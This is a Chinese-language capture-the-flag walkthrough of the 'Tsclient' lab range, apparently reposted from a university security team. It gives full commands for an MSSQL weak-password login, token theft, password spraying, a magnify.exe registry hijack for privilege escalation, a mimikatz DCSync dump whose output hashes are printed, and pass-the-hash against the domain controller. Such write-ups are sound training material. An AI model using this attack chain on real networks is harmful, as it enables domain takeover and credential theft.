文章总结： 该文档记录了春秋云境Tsclient靶场的渗透实战过程。攻击者利用MSSQL弱口令进入内网，经甜土豆提权获取权限；随后通过内网扫描与Token窃取获取凭证，利用注册表镜像劫持实现横向移动与提权；最终通过DCSync导出域管哈希并利用PTH攻击域控。文章详细展示了从外网打点到域控接管的全流程技术细节。 综合评分： 85 文章分类： 渗透测试,内网渗透,实战经验,CTF

---

春秋云境-Tsclient

原创

仰恩网安校队 仰恩网安校队

GET不到的FLAG

2026年3月16日 21:22 福建

春秋云境Tsclient

Tsclient是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有3个flag，分布于不同的靶机。

flag1

我们获得目标的ip地址39.99.132.111，使用fscan进行扫描

发现一个80端口和1433端口的服务为mssql暴露在公网，并且存在弱口令

接下来用mdut这个工具去连接mssql，官方链接是https://github.com/SafeGroceryStore/MDUT/releases/tag/v2.1.1

连接了时候很不顺利，去年还好好的今年突然连不上了，驱动报错，我一直在哭。后来排查发现配置文件那里我去年图省事直接解压到C盘，后来迁移了驱动路径没变导致的，给大家踩了个坑

尝试激活XP_Cmdshell组件，并且执行whoami，出现回显

我们并没有发现flag文件，并且查看不了图中Administrator底下的文件，打mssql首选甜土豆，上传甜土豆

获得system权限，刚才又吓我一跳，执行的时候说什么sock断连，还好重启了下没事

因为一点问题应该是执行命令的时候没有-a，这里重启下靶场，上传木马，成功上线vshell拿到第一个flag

flag2

上传fscan扫描内网

C:\Users\Administrator\flag>ipconfig

Windows IP 配置

以太网适配器 以太网:

   连接特定的 DNS 后缀 . . . . . . . :    本地链接 IPv6 地址. . . . . . . . : fe80::186e:2015:29a3:dc5c%14    IPv4 地址 . . . . . . . . . . . . : 172.22.8.18    子网掩码  . . . . . . . . . . . . : 255.255.0.0    默认网关. . . . . . . . . . . . . : 172.22.255.253

隧道适配器 isatap.{E309DFD0-37D7-4E89-A23A-3C61210B34EA}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开连接    连接特定的 DNS 后缀 . . . . . . . :

隧道适配器 Teredo Tunneling Pseudo-Interface:

   连接特定的 DNS 后缀 . . . . . . . :    IPv6 地址 . . . . . . . . . . . . : 2001:0:14c9:d206:1cea:21e3:d89d:8adf    本地链接 IPv6 地址. . . . . . . . : fe80::1cea:21e3:d89d:8adf%12    默认网关. . . . . . . . . . . . . : ::

C:\Users\Administrator\flag>fscan.exe -h 172.22.8.18/24

   ___                              _   / _ \     ___  ___ _ __ __ _  ___| | __  / /_\/____/ __|/ __| ‘__/ _` |/ __| |/ / / /_\_____\_ \ (__| | | (_| | (__|   < \___/     |___/\__|_|  \_,_|\__|_|\\                      fscan version: 1.8.4 start infoscan (icmp) Target 172.22.8.18     is alive (icmp) Target 172.22.8.15     is alive (icmp) Target 172.22.8.31     is alive (icmp) Target 172.22.8.46     is alive [*] Icmp alive hosts len is: 4 172.22.8.46:445 open 172.22.8.31:445 open 172.22.8.18:1433 open 172.22.8.15:445 open 172.22.8.18:445 open 172.22.8.46:139 open 172.22.8.31:139 open 172.22.8.15:139 open 172.22.8.15:88 open 172.22.8.46:135 open 172.22.8.31:135 open 172.22.8.18:139 open 172.22.8.15:135 open 172.22.8.18:135 open 172.22.8.46:80 open 172.22.8.18:80 open [*] alive ports len is: 16 start vulscan [*] NetInfo [*]172.22.8.31    [->]WIN19-CLIENT    [->]172.22.8.31 [*] NetInfo [*]172.22.8.46    [->]WIN2016    [->]172.22.8.46 [*] NetBios 172.22.8.15     [+] DC:XIAORANG\DC01 [*] NetBios 172.22.8.31     XIAORANG\WIN19-CLIENT [*] NetInfo [*]172.22.8.15    [->]DC01    [->]172.22.8.15 [*] WebTitle http://172.22.8.18        code:200 len:703    title:IIS Windows Server [*] NetBios 172.22.8.46     WIN2016.xiaorang.lab                Windows Server 2016 Datacenter 14393 [*] NetInfo [*]172.22.8.18    [->]WIN-WEB    [->]172.22.8.18    [->]2001:0:14c9:d206:1cea:21e3:d89d:8adf [*] WebTitle http://172.22.8.46        code:200 len:703    title:IIS Windows Server [+] mssql 172.22.8.18:1433:sa 1qaz!QAZ

172.22.8.15 (DC01) ├── 角色: 域控制器 ⭐ ├── 证据: │   ├── 88端口开放 (Kerberos) │   ├── NetBios显示 “DC:XIAORANG\DC01” │   └── 主机名 DC01 └── 重要性: 内网核心，拿下即可控制整个域

172.22.8.18 (WIN-WEB) ├── 角色: Web服务器 ├── 服务: IIS (80端口), SQL Server (1433) └── 状态: 已控 ✅

172.22.8.46 (WIN2016) ├── 角色: 另一台Web服务器 ├── 服务: IIS (80端口) └── 状态: 待攻击

172.22.8.31 (WIN19-CLIENT) ├── 角色: 域内客户端 └── 状态: 待横向移动

同时在flag01.txt中结尾给了一句提示：Maybe you should focus on user sessions，注意会话信息

quser命令 # 查看当前服务器用户连接状态

C:\Users\Administrator\flag>quser  用户名                会话名             ID  状态    空闲时间   登录时间  john                  rdp-tcp#0           2  运行中         33  2026/3/16 16:38

发现用户john的会话，因为用的是vshell插件没那么好，那就按部就班的渗透，下一个靶场开始用cs

我们知道john是存在令牌的，可以尝试进行令牌窃取

我们先在机器上创建用户

net user test Admin@123 /add net localgroup administrators test /add

然后用proxifier设置全局代理，进行rdp连接

mstsc成功连接

同样进行上线

SharpToken.exe execute “WIN-WEB\John” cmd true

使用ShrakToken来抓取John的令牌，发现有一个问题

说起来这个问题曾经在我物理机上出现过，当时网上找遍了各种方法都不行，最后还是在闲鱼找人安装了（笑）

由于刚才手贱点了重新启动，导致我不得不重启整个靶场，因为john下线了

这次终于成功了

我们执行net use，用John查看共享资源

net use命令用于显示当前用户建立的网络连接列表。如果john用户之前连接过某些共享文件夹（例如，访问过文件服务器上的共享），那么这些连接信息可能会暴露重要的内部资源位置，甚至可能包含自动登录的凭据。通过检查这些共享连接，攻击者可以找到额外的目标系统或敏感文件，这是横向移动和信息收集的重要步骤。

查看里面的敏感文件，发现有一个凭证和提示（你知道如何劫持图片吗？显然看出这里要我们镜像劫持）

对内网机器进行密码喷洒

proxychains crackmapexec smb 172.22.8.1/24 -u Aldrich -p ‘Ald@rLMWuy7Z!#’ -d xiaorang.lab 2>/dev/null

登录172.22.8.46（参考别的wp说只有这个可以）

proxychains rdesktop 172.22.8.46

在这里登录后会提示你改密码，改完密码后终于可以用mstsc登录了，linux那个太反人类了

查看权限发现我们是普通用户

在powershell运行这题命令可以看到登录用户都有修改注册表的权限

get-acl -path “HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options” | fl *

因此可以修改注册表映像劫持，使用放大镜进行提权

REG ADD “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe” /v Debugger /t REG_SZ /d “C:\windows\system32\cmd.exe”

我们先锁定用户。然后再点击放大镜就会弹出cms窗口

这条命令是一个非常经典的Windows权限维持/提权技巧——利用放大镜劫持

这时候电脑有点卡了，搞个马上线继续

尴尬，发现不出网，直接拿flag

flag{5d34ffd8-34af-4dfa-b1f6-1dbfa72f4162}

flag3

查看域控管理员

net group “domain admins” /domain net config workstation

C:\Users\Aldrich>net config workstation 计算机名                     \WIN2016 计算机全名                   WIN2016.xiaorang.lab 用户名                       Aldrich

工作站正运行于         NetBT_Tcpip_{A1A4778C-1DE0-4511-8FC6-5EEFB0372913} (00163E3CAA87)

软件版本                     Windows Server 2016 Datacenter

工作站域                     XIAORANG 工作站域 DNS 名称            xiaorang.lab 登录域                       XIAORANG

COM 打开超时 (秒)            0 COM 发送计数 (字节)          16 COM 发送超时 (毫秒)          250 命令成功完成。

C:\Users\Aldrich>net group “domain admins” /domain 这项请求将在域 xiaorang.lab 的域控制器处理。

组名     Domain Admins 注释     指定的域管理员

成员

---

Administrator            WIN2016$ 命令成功完成。

发现172.22.1.46主机（即win2016）是域管理员

上传猕猴桃，准备抓取hash

利用前面获得的管理员权限运行猕猴桃：

mimikatz.exe “privilege::debug” “lsadump::dcsync /domain:xiaorang.lab /all /csv” “exit”

从你提供的Mimikatz DCSync输出中，可以提取到域控（15）上所有用户的哈希。其中最关键的是域管理员 Administrator 的 NTLM 哈希：

RID           用户名           NTLM 哈希           说明 500           Administrator           2c9d81bdcf3ec8b1def10328a7cc2f08           域管理员账户，可直接用于登录域控 502           krbtgt           3ffd5b58b4a6328659a606c3ea6f9b63           用于生成黄金票据的账户 1000           DC01$           1f0499e2863a723ebaad01877ef9f10288           域控机器账户 1103           WIN2016$           42cd893158c2d5b1ce3da6e55d3606b8           域内机器账户 1104           WIN19-CLIENT$           bdb4d7d68d7bbe9b78422672479740d           域内机器账户 1105           Aldrich           570a9a65db8fba761c1008a51d4c95ab           域内普通用户

接着就可以用PTH打DC

proxychains crackmapexec smb 172.22.8.15 -u Administrator -H 2c9d81bdcf3ec8b1def10328a7cc2f08 -d xiaorang -x “type C:\Users\Administrator\flag\flag03.txt”

获得flag

flag{3795c1fe-c2c0-4324-827e-725d4cc4635e}

---

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：GET不到的FLAG 仰恩网安校队 仰恩网安校队《春秋云境-Tsclient》